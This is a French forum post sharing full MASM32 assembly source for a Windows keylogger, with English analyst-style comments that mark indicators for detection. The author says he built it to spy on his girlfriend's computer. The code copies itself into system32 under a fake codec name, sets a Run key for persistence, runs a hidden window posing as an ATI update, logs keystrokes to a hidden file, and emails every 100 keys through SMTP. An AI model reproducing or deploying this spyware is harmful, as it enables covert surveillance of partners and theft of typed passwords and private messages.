Bonjour à tous !
Ce prog porte bien son nom : je l'ai programmé sans aucune intention de nuire à quelqu'un, c'était juste pour espionner l'ordi de ma copine. C'est ça d'être jaloux !
Enfin, je l'ai programmé vite fait, en 3 heures plus précisément ; je n'ai pas un niveau élevé en assembleur, et surtout je n'ai pas le temps nécessaire...
Alors attention si vous compilez cette source, surtout si vous êtes débutant.
Le programme s'inscrit dans la base de registre pour se lancer à chaque démarrage, c'est classique ! Il se copie aussi dans le répertoire system32.
Le programme capture 100 touches du clavier et les envoie par e-mail.
Il crée aussi des fichiers dans system32 !
Bref, il y a des bugs, mais moi il m'a servi.
Depuis, le programme sur l'ordi est désactivé, et je lui fais confiance.
J'espère que vous n'utiliserez pas cette source pour des actions malveillantes ; la source a pour but de montrer des fonctions intéressantes.
Ne soyez pas assistés, comprenez par vous-mêmes.
Bonne prog!!!
Source / Exemple :
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\rand.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
; Prototype for Mys (defined at the end of the file): one DWORD argument.
Mys PROTO :DWORD
; Defini Name, Text
; Emits a DWORD named Name that holds Text, followed by a zero DWORD, directly
; in the code stream, and jumps over that data so execution resumes at lbl.
; With a one-character Text the result reads as a NUL-terminated
; one-character string at label Name.
; For analysis: every expansion leaves a "jmp over inline data" pattern in
; the code section, one per monitored key.
Defini MACRO Name, Text:VARARG
LOCAL lbl
jmp lbl
Name dd Text,0
lbl:
ENDM
; Prototype for WinMain: four DWORD arguments.
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
; Initialised data. The literal strings below are the most useful static
; indicators in this sample: host name, window class/title, dropped file
; name, Run key path and the SMTP envelope.
.DATA
buffer db "smtp.wanadoo.fr",0 ; SMTP host name, resolved before connect
ClassName db "WinClasseAti",0 ; window class registered in WinMain
AppName db "AtiUpdate",0 ; window title passed to CreateWindowEx
NbByteWritten dd 0 ; receives the byte count from WriteFile
Demain dd ? ; loop counter of the file-name generator (WM_CREATE)
Fiere dd 0 ; receives the flags from InternetGetConnectedState
Ordre dd ? ; key hits counted since the last send
Soleil db "\",0 ; path separator appended between directory and file name
Ainsi db "CodecAti4869.exe",0 ; name of the copied executable and of the Run value
HELO db "EHLO smtp.wanadoo.fr",13 ,10 ,0 ; SMTP commands, each terminated by CR LF
MAIL_FROM db "MAIL FROM: <Cequelledi@aol.com>",13 ,10 ,0
RCPT_TO db "RCPT TO: <Email@wanadoo.fr>",13 ,10 ,0 ; recipient mailbox; the author marks this value as one to be edited
DONNEES db "DATA",13 ,10 ,0
TEXTE db " ",13 ,10 ,13 ,10 ,0 ; appended to the captured text before it is sent
FIN_DONNEES db ".",13 ,10 ,0 ; end-of-message marker line
RegistreRun db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 ; autostart key, opened under HKEY_LOCAL_MACHINE
FERME db "QUIT",13 ,10 ,0
wsadata WSADATA <> ; filled in by WSAStartup
sin sockaddr_in <> ; destination address for connect
Port dd 25 ; SMTP port in host byte order; htons is applied before use
; Uninitialised data.
.DATA?
hInstance HINSTANCE ? ; module handle from GetModuleHandle
CommandLine LPSTR ? ; pointer from GetCommandLine
hFile dd ? ; handle of the local capture file (CreateFile in WM_CREATE)
Nom db 8 dup(?) ; generated file name
Lettre db 1 dup(?) ; one generated letter, used as a lstrcat source
Information db 255 dup (?) ; in-memory capture buffer, later sent as the mail body
sock dd ? ; SMTP socket
buf db 255 dup (?) ; receive buffer for server replies
CheminSystem db 256 dup(?) ; system directory; "\" and Nom are appended in WM_CREATE
Regarder db 256 dup(?) ; full path of the running executable
CheminExec db 256 dup(?) ; destination path of the copy, also the Run value data
hReg dd ? ; registry key handle
ip dd ? ; result of inet_addr on the host name
.CODE
;-----------------------------------------------------------------------
; start - process entry point.
; Copies the running executable to <system directory>\CodecAti4869.exe,
; stores that path as a value under the HKLM Run key, seeds the random
; generator, then calls WinMain and exits with its return value.
; None of the API return values in this block is checked.
; For triage: the Run value named "CodecAti4869.exe" and the file of the
; same name in the system directory are the persistence artefacts.
; NOTE(review): writing to HKLM and to the system directory presumably
; needs administrative rights; without them these calls would fail and the
; code would carry on regardless - confirm on the target OS version.
;-----------------------------------------------------------------------
start:
; Regarder = path of the current executable.
invoke GetModuleFileName,0,addr Regarder,sizeof Regarder
invoke GetSystemDirectory,addr CheminSystem,sizeof CheminSystem
; CheminExec = CheminSystem + "\" + "CodecAti4869.exe" (unbounded lstrcat).
invoke lstrcat,addr CheminExec,addr CheminSystem
invoke lstrcat,addr CheminExec,addr Soleil
invoke lstrcat,addr CheminExec,addr Ainsi
; Last argument 0: an existing destination file is overwritten.
invoke CopyFile,addr Regarder,addr CheminExec,0
; Access mask 20006h is the value of KEY_WRITE.
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg
; Type 1 is REG_SZ; the data length passed is the whole 256-byte buffer.
invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec
invoke RegCloseKey, hReg
; Seed the generator from rand.inc with the tick count.
INVOKE GetTickCount
INVOKE Randomize,eax
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
;
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess, eax
;-----------------------------------------------------------------------
; WinMain(hInst, hPrevInst, CmdLine, CmdShow) - stdcall.
; Registers the window class "WinClasseAti", creates one window titled
; "AtiUpdate" and runs the message loop until GetMessage returns 0.
; Returns msg.wParam in eax.
; The CreateWindowEx result is not stored (the local hwnd is unused),
; CmdShow is never used and no ShowWindow call appears here, so this code
; never makes the window visible. The window exists only to give WndProc
; a message/timer source; its class and title are usable when enumerating
; top-level windows during triage.
;-----------------------------------------------------------------------
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
; Fill the WNDCLASSEX structure.
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
; Uses the global hInstance rather than the hInst parameter.
push hInstance
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
; Window style has no WS_VISIBLE bit; the returned handle is discarded.
invoke CreateWindowEx,NULL, ADDR ClassName, ADDR AppName, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInst, NULL
; Standard message pump; leaves when GetMessage returns 0.
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
;-----------------------------------------------------------------------
; WndProc(hWnd, uMsg, wParam, lParam) - stdcall window procedure.
;
; WM_CREATE: seeds the random generator, builds a file name from generated
;   letters, appends "\" and that name to CheminSystem and opens/creates
;   the file for writing; the handle is kept in hFile.
; WM_TIMER:  re-writes the HKLM Run value, then - only when
;   InternetGetConnectedState returns nonzero - polls A-Z and SPACE with
;   GetAsyncKeyState. Each hit is counted in Ordre, appended to Information
;   and written as one byte to hFile. When Ordre equals 100 the content of
;   Information is sent through an SMTP session on TCP port 25.
; Every message is finally handed to DefWindowProc.
;
; No API return value is checked except those used for branching.
; Artefacts for detection and forensics: repeated writes to the Run value
; named by Ainsi, an extension-less file with a letters-only name in the
; system directory that keeps growing (it is never cleared here), and a
; non-mail process opening plain SMTP sessions to the host in buffer.
;-----------------------------------------------------------------------
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
; Executed for every message, before uMsg is tested: timer id 0,
; 100 ms interval, no callback (WM_TIMER is posted to this window).
Invoke SetTimer,hWnd,0,100, 0
.if uMsg == WM_TIMER
; Re-assert the autostart value on every tick (access mask 20006h is the
; value of KEY_WRITE, type 1 is REG_SZ).
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg
invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec
invoke RegCloseKey, hReg
; Skip the whole tick when no Internet connection is reported.
invoke InternetGetConnectedState, ADDR Fiere, 0
test eax, eax
jnz @@on_line
jmp @@exit
@@on_line:
; The 27 blocks below are identical apart from the virtual-key code and the
; character. Pattern: poll the key; on a nonzero result count it, let the
; Defini macro place the character as inline data, append it to Information
; (unbounded lstrcat into a 255-byte buffer) and write that one byte to
; hFile with WriteFile(hFile, &DefN, 1, &NbByteWritten, 0).
Invoke GetAsyncKeyState, VK_A
.if eax != 0
inc Ordre
Defini Def,"A"
invoke lstrcat,addr Information, addr Def
push 0
push offset NbByteWritten
push 1
push offset Def
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_B
.if eax != 0
inc Ordre
Defini Def1,"B"
invoke lstrcat,addr Information, addr Def1
push 0
push offset NbByteWritten
push 1
push offset Def1
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_C
.if eax != 0
inc Ordre
Defini Def2,"C"
invoke lstrcat,addr Information, addr Def2
push 0
push offset NbByteWritten
push 1
push offset Def2
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_D
.if eax != 0
inc Ordre
Defini Def3,"D"
invoke lstrcat,addr Information, addr Def3
push 0
push offset NbByteWritten
push 1
push offset Def3
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_E
.if eax != 0
inc Ordre
Defini Def4,"E"
invoke lstrcat,addr Information, addr Def4
push 0
push offset NbByteWritten
push 1
push offset Def4
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_F
.if eax != 0
inc Ordre
Defini Def5,"F"
invoke lstrcat,addr Information, addr Def5
push 0
push offset NbByteWritten
push 1
push offset Def5
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_G
.if eax != 0
inc Ordre
Defini Def6,"G"
invoke lstrcat,addr Information, addr Def6
push 0
push offset NbByteWritten
push 1
push offset Def6
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_H
.if eax != 0
inc Ordre
Defini Def7,"H"
invoke lstrcat,addr Information, addr Def7
push 0
push offset NbByteWritten
push 1
push offset Def7
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_I
.if eax != 0
inc Ordre
Defini Def8,"I"
invoke lstrcat,addr Information, addr Def8
push 0
push offset NbByteWritten
push 1
push offset Def8
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_J
.if eax != 0
inc Ordre
Defini Def9,"J"
invoke lstrcat,addr Information, addr Def9
push 0
push offset NbByteWritten
push 1
push offset Def9
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_K
.if eax != 0
inc Ordre
Defini Def10,"K"
invoke lstrcat,addr Information, addr Def10
push 0
push offset NbByteWritten
push 1
push offset Def10
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_L
.if eax != 0
inc Ordre
Defini Def11,"L"
invoke lstrcat,addr Information, addr Def11
push 0
push offset NbByteWritten
push 1
push offset Def11
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_M
.if eax != 0
inc Ordre
Defini Def12,"M"
invoke lstrcat,addr Information, addr Def12
push 0
push offset NbByteWritten
push 1
push offset Def12
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_N
.if eax != 0
inc Ordre
Defini Def13,"N"
invoke lstrcat,addr Information, addr Def13
push 0
push offset NbByteWritten
push 1
push offset Def13
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_O
.if eax != 0
inc Ordre
Defini Def14,"O"
invoke lstrcat,addr Information, addr Def14
push 0
push offset NbByteWritten
push 1
push offset Def14
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_P
.if eax != 0
inc Ordre
Defini Def15,"P"
invoke lstrcat,addr Information, addr Def15
push 0
push offset NbByteWritten
push 1
push offset Def15
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_Q
.if eax != 0
inc Ordre
Defini Def16,"Q"
invoke lstrcat,addr Information, addr Def16
push 0
push offset NbByteWritten
push 1
push offset Def16
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_R
.if eax != 0
inc Ordre
Defini Def17,"R"
invoke lstrcat,addr Information, addr Def17
push 0
push offset NbByteWritten
push 1
push offset Def17
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_S
.if eax != 0
inc Ordre
Defini Def18,"S"
invoke lstrcat,addr Information, addr Def18
push 0
push offset NbByteWritten
push 1
push offset Def18
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_T
.if eax != 0
inc Ordre
Defini Def19,"T"
invoke lstrcat,addr Information, addr Def19
push 0
push offset NbByteWritten
push 1
push offset Def19
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_U
.if eax != 0
inc Ordre
Defini Def20,"U"
invoke lstrcat,addr Information, addr Def20
push 0
push offset NbByteWritten
push 1
push offset Def20
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_V
.if eax != 0
inc Ordre
Defini Def21,"V"
invoke lstrcat,addr Information, addr Def21
push 0
push offset NbByteWritten
push 1
push offset Def21
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_W
.if eax != 0
inc Ordre
Defini Def22,"W"
invoke lstrcat,addr Information, addr Def22
push 0
push offset NbByteWritten
push 1
push offset Def22
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_X
.if eax != 0
inc Ordre
Defini Def23,"X"
invoke lstrcat,addr Information, addr Def23
push 0
push offset NbByteWritten
push 1
push offset Def23
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_Y
.if eax != 0
inc Ordre
Defini Def24,"Y"
invoke lstrcat,addr Information, addr Def24
push 0
push offset NbByteWritten
push 1
push offset Def24
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_Z
.if eax != 0
inc Ordre
Defini Def25,"Z"
invoke lstrcat,addr Information, addr Def25
push 0
push offset NbByteWritten
push 1
push offset Def25
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_SPACE
.if eax != 0
inc Ordre
Defini Def26," "
invoke lstrcat,addr Information, addr Def26
push 0
push offset NbByteWritten
push 1
push offset Def26
push hFile
call WriteFile
.endif
; Send branch: taken only when the counter is exactly 100 at this point.
; The SMTP exchange below uses no authentication and no TLS; every server
; reply is read into buf and then ignored.
.if Ordre == 100
mov Ordre,0
invoke WSAStartup,101h,addr wsadata ; initialise Winsock, version 1.1 requested
invoke socket,AF_INET,SOCK_STREAM,IPPROTO_IP
mov sock,eax
mov sin.sin_family,AF_INET ; address family
invoke htons,Port ; port 25 converted to network byte order
mov sin.sin_port,ax
; buffer holds a host name, so inet_addr is expected to return INADDR_NONE
; and the gethostbyname path to be the one taken.
invoke inet_addr,addr buffer
mov ip,eax
.if eax==INADDR_NONE
invoke gethostbyname,addr buffer
.if eax!=NULL
; Offset 12 is h_addr_list in the 32-bit hostent layout; the two further
; loads fetch the first address, which inet_ntoa turns into a string.
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke inet_ntoa,eax
.else
jmp endit
.endif
.else
invoke gethostbyaddr,addr ip,4,2
.if eax == 0
jmp endit
.endif
; NOTE(review): the next line holds two statements ("mov eax,[eax]" and
; ".endif"); they were presumably on separate lines before the page was
; extracted. Left exactly as found.
mov eax,[eax] .endif
endit:
invoke inet_addr, eax ; numeric address of the SMTP host
mov sin.sin_addr, eax
invoke connect, sock, addr sin ,sizeof sin ; connect to the server
invoke recv, sock, addr buf, sizeof buf, 0 ; read the greeting (nothing is displayed)
; HELO SERVER
invoke Mys, addr HELO ; sends the EHLO line held in HELO
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr HELO, MB_OK
; MAIL FROM:
invoke Mys, addr MAIL_FROM ; sends MAIL FROM:
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr MAIL_FROM, MB_OK
; RCPT TO:
invoke Mys, addr RCPT_TO ; sends RCPT TO:
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr RCPT_TO, MB_OK
; DATA
invoke Mys, addr DONNEES ; sends DATA
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr DONNEES, MB_OK
; Message body = captured text followed by TEXTE; no headers are sent.
invoke lstrcat,addr Information, addr TEXTE
invoke Mys, addr Information ; sends the captured text
; end of DATA
invoke Mys, addr FIN_DONNEES ; sends the "." terminator line
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr FIN_DONNEES, MB_OK
; QUIT
invoke Mys, addr FERME ; sends QUIT
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr FERME, MB_OK
; Zero the first byte: Information becomes an empty string again. The copy
; already written through hFile is not touched.
mov Information,0
invoke closesocket,sock ; close the socket
.endif
@@exit:
.elseif uMsg == WM_CREATE
INVOKE GetTickCount
INVOKE Randomize,eax
mov Ordre,0
mov Demain,0
; File-name generator: each pass appends one byte (Rand result + 97, i.e.
; starting at 'a'; presumably a-z if Rand,26 yields 0..25 - confirm against
; rand.inc) to Nom and repeats while Demain <= 7 after the increment.
GenereNom:
INVOKE Rand,26
add al,97
mov Lettre,al
invoke lstrcat,addr Nom, addr Lettre
inc Demain
cmp Demain,7
jng GenereNom
; CheminSystem (filled with the system directory at start) += "\" + Nom.
invoke lstrcat,addr CheminSystem, addr Soleil
invoke lstrcat,addr CheminSystem, addr Nom
; OPEN_ALWAYS: open the file if present, create it otherwise. The handle
; stays open (readers allowed via FILE_SHARE_READ); no CloseHandle appears
; in this file.
invoke CreateFile,ADDR CheminSystem,GENERIC_WRITE,FILE_SHARE_READ,
0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
.endif
; Default processing for every message, including the two handled above.
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
WndProc endp
;-----------------------------------------------------------------------
; Mys(SendStr) - stdcall.
; Sends the NUL-terminated string at SendStr over the global socket sock,
; one byte per send() call; the terminator itself is not sent.
; edi is saved and restored; the result of send is ignored, so a failed or
; closed connection is not noticed here.
; On the wire this shows up as SMTP commands split into one-byte send
; calls, which is unusual for a normal mail client.
;-----------------------------------------------------------------------
Mys proc SendStr : DWORD
push edi
mov edi, SendStr
.WHILE TRUE
; Stop at the terminating zero byte.
.BREAK .IF (byte ptr [edi] == 0 )
invoke send, sock, edi, 1, 0
inc edi
.ENDW
pop edi
ret
Mys endp
end start